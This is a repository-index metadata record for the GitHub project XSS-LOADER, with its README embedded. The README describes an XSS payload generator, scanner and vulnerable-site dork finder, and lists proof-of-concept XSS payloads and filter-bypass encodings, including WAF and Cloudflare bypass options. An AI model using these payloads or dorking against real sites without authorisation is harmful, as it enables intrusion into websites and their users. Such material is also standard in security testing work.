{"id":13642291,"url":"https://github.com/capture0x/XSS-LOADER","last_synced_at":"2025-04-20T16:31:25.093Z","repository":{"id":40270295,"uuid":"249506764","full_name":"capture0x/XSS-LOADER","owner":"capture0x","description":"Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder","archived":false,"fork":false,"pushed_at":"2023-07-25T15:47:52.000Z","size":50,"stargazers_count":543,"open_issues_count":10,"forks_count":112,"subscribers_count":15,"default_branch":"master","last_synced_at":"2024-08-03T01:26:01.308Z","etag":null,"topics":["bypass-filter","dork-finder","hacking","payload-generator","payloads","xss","xss-attacks","xss-bypass","xss-detection","xss-finder","xss-injection","xss-payloads","xss-scanner"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"cc0-1.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/capture0x.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-03-23T18:04:36.000Z","updated_at":"2024-08-01T18:13:24.000Z","dependencies_parsed_at":"2023-01-25T07:30:43.705Z","dependency_job_id":null,"html_url":"https://github.com/capture0x/XSS-LOADER","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capture0x%2FXSS-LOADER","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capture0x%2FXSS-LOADER/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capture0x%2FXSS-LOADER/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/capture0x%2FXSS-LOADER/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/capture0x","download_url":"https://codeload.github.com/capture0x/XSS-LOADER/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223832930,"owners_count":17210748,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass-filter","dork-finder","hacking","payload-generator","payloads","xss","xss-attacks","xss-bypass","xss-detection","xss-finder","xss-injection","xss-payloads","xss-scanner"],"created_at":"2024-08-02T01:01:29.484Z","updated_at":"2025-04-20T16:31:25.083Z","avatar_url":"https://github.com/capture0x.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"   # :gem:  \u0026nbsp;  XSS-LOADER TOOLS  \u0026nbsp;  :gem:\n\n\u003cimg src=\"https://i.imgur.com/RvwHNfS.png\" width=\"60%\"\u003e\u003c/img\u003e\n\n\n\n#### Written by TMRSWRR \n#### Version 1.0.0\nAll in one tools for **XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER**\n\nInstagram: [TMRSWRR](https://www.instagram.com/tmrswrr/)\n##  :camera: Screenshots  :camera:\n\n\u003cimg src=\"https://i.imgur.com/mnRkb1b.png\" width=\"32%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://i.imgur.com/8vdFrl6.png\" width=\"32%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://i.imgur.com/E7t30Cf.png\" width=\"32%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://i.imgur.com/jMGDl5C.png\" width=\"32%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://i.imgur.com/fwAETe2.png\" width=\"32%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://i.imgur.com/jmBmGH1.png\" width=\"32%\"\u003e\u003c/img\u003e\n\n\n\n\n\n## 👇 :love_letter:  How to use  :love_letter: 👇\n\n[![How to use](https://i.imgur.com/l44jOXW.png)](https://www.youtube.com/watch?v=ys_a5yx1hmY)\n\n\n\n\n## 📒 Read Me 📒\n\n* This tool creates payload for use in xss injection\n* Select default payload tags from parameter or  write your payload\n* It makes xss inj. with Xss Scanner parameter\n* It finds vulnerable sites url with Xss Dork Finder parameter\n\n\n##  :cd: Installation  :cd:\n### Installation with requirements.txt\n\n```bash\ngit clone https://github.com/capture0x/XSS-LOADER/\ncd XSS-LOADER\npip3 install -r requirements.txt\n```\n\n## Usage\n\n```bash\npython3 payloader.py\n```\n\n\n## 🗃️  Features  🗃️\n\n\n#### *Basic Payload\n\nSets default parameter to :```\u003cscript\u003ealert(1)\u003c/script\u003e```\n\n#### *Div Payload\n\nSets default parameter to :```\u003cdiv onpointerover='alert(1)'\u003eMOVE HERE\u003c/div```\n\n#### *Img Payload\n\nSets default parameter to :```\u003cimg src=x onerror=alert('1');\u003e```\n\n#### *Body Payload\n\nSets default parameter to :```\u003cbody ontouchstart=alert(1)\u003e```\n\n#### *Svg Payload\n\nSets default parameter to :```\u003csvg onload=alert('1')\u003e```\n\n#### *Enter Your Payload\n\nEncodes payload writed by user\n\n\n#### *Payload Generator Parameter\n\nEncodes payload on selected tag\n\n#\n```\n* |   1.  UPPER CASE----\u003e  \u003cSCRIPT\u003eALERT(1)\u003c/SCRIPT\u003e              \n* |   2.  UPPER AND LOWER CASE----\u003e \u003cScRiPt\u003ealeRt(1)\u003c/ScRiPt\u003e   \n* |   3.  URL ENCODE -----\u003e   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           \n* |   4.  HTML ENTITY ENCODE-----\u003e  \u0026lt;script\u0026gt;alert(1)\u0026lt;/script\u0026gt; \n* |   5.  SPLIT PAYLOAD -----\u003e  \u003cscri\u003c/script\u003ept\u003e\u003ealert(1)\u003c/scri\u003c/script\u003ept\u003e\u003e       \n* |   6.  HEX ENCODE -----\u003e  3c7363726970743e616c6572742831293c2f7363726970743e       \n* |   7.  UTF-16 ENCODE -----\u003e Encode payload to utf-16 format.   \n* |   8.  UTF-32 ENCODE-----\u003e  Encode payload to utf-32 format.          \n* |   9.  DELETE TAG -----\u003e \";alert('XSS');//            \n* |  10.  UNICODE ENCODE-----\u003e    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         \n* |  11.  US-ASCII ENCODE -----\u003e  ¼script¾alert(1)¼/script¾      \n* |  12.  BASE64 ENCODE -----\u003e   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          \n* |  13.  UTF-7 ENCODE -----\u003e   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           \n* |  14.  PARENTHESIS BYPASS -----\u003e  \u003cscript\u003ealert`1`\u003c/script\u003e   \n* |  15.  UTF-8 ENCODE -----\u003e  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          \n* |  16.  TAG BLOCK BREAKOUT-----\u003e \"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n* |  17.  SCRIPT BREAKOUT-----\u003e  \u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n* |  18.  FILE UPLOAD PAYLOAD-----\u003e \"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e.gif\n* |  19.  INSIDE COMMENTS BYPASS-----\u003e \u003c!--\u003e\u003cscript\u003ealert(1)\u003c/script\u003e--\u003e\n* |  20.  MUTATION PAYLOAD-----\u003e \u003cnoscript\u003e\u003cp title=\"\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n* |  21.  MALFORMED IMG-----\u003e \u003cIMG \"\"\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n* |  22.  SPACE BYPASS-----\u003e \u003cimg^Lsrc=x^Lonerror=alert('1');\u003e\n* |  23.  DOWNLEVEL-HIDDEN BLOCK-----\u003e \u003c!--[if gte IE 4]\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c![endif]--\u003e\n* |  24.  WAF BYPASS PAYLOADS-----\u003e Show Waf Bypass Payload List\n* |  25.  CLOUDFLARE BYPASS PAYLOADS-----\u003e Show Cloudflare Bypass Payload List\n* |  26.  POLYGLOT PAYLOADS-----\u003e Show Polyglot Bypass Payload List\n* |  27.  ALERT PAYLOADS-----\u003e Show Alert Payload List\n* |  28.  ALL CREATE PAYLOAD-----\u003e Show Create All Payloads\n* |  29.  GO BACK MAIN MENU\n* |  30.  EXIT\n```\n\n#### *Xss Scanner\n\nInitially you'll need to enter url of target\nPlease enter the url like this example==\u003ee.g target -----\u003e http://target.com/index.php?name=\nSelected for scanning payload list\n\n* BASIC PAYLOAD LIST   ==\u003e Payload list consisting of script tag\n* DIV PAYLOAD LIST     ==\u003e Payload list consisting of div tag\n* IMG PAYLOAD LIST     ==\u003e Payload list consisting of img tag\n* BODY PAYLOAD LIST    ==\u003e Payload list consisting of body tag\n* SVG PAYLOAD LIST     ==\u003e Payload list consisting of svg tag\n* MIXED PAYLOAD LIST   ==\u003e Payload list consisting of all tag\n* ENTER FILE PATH      ==\u003e Payload list determined by the user ,Please enter the url like this example..!\n(e.g. path -----\u003e /usr/share/wordlists/wfuzz/Injections/XSS.txt)\n\nResults will be added in \"vulnpayload.txt\" after scanning.\n\n\n#### *Xss Dork Finder\n\nFirst enter the dork for searching:\n   e.g----\u003einurl:\"search.php?q=\"\nResults will be saved in \"dork.txt\" after scanning.\n\n## Known Issues\n\n### Fixed:\n- Unicode errors\n\n- Module errors\n\n**Important:**\n\nIf you want to use tool for python3 installed on Windows download below link:\n\nhttps://github.com/capture0x/XSS-LOADER-for-WINDOWS\n\n\n## Bugs and enhancements\n\nFor bug reports or enhancements, please open an [issue](https://github.com/capture0x/XSS-LOADER/issues) here.\n\n\n\n**Copyright 2020**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcapture0x%2FXSS-LOADER","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcapture0x%2FXSS-LOADER","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcapture0x%2FXSS-LOADER/lists"}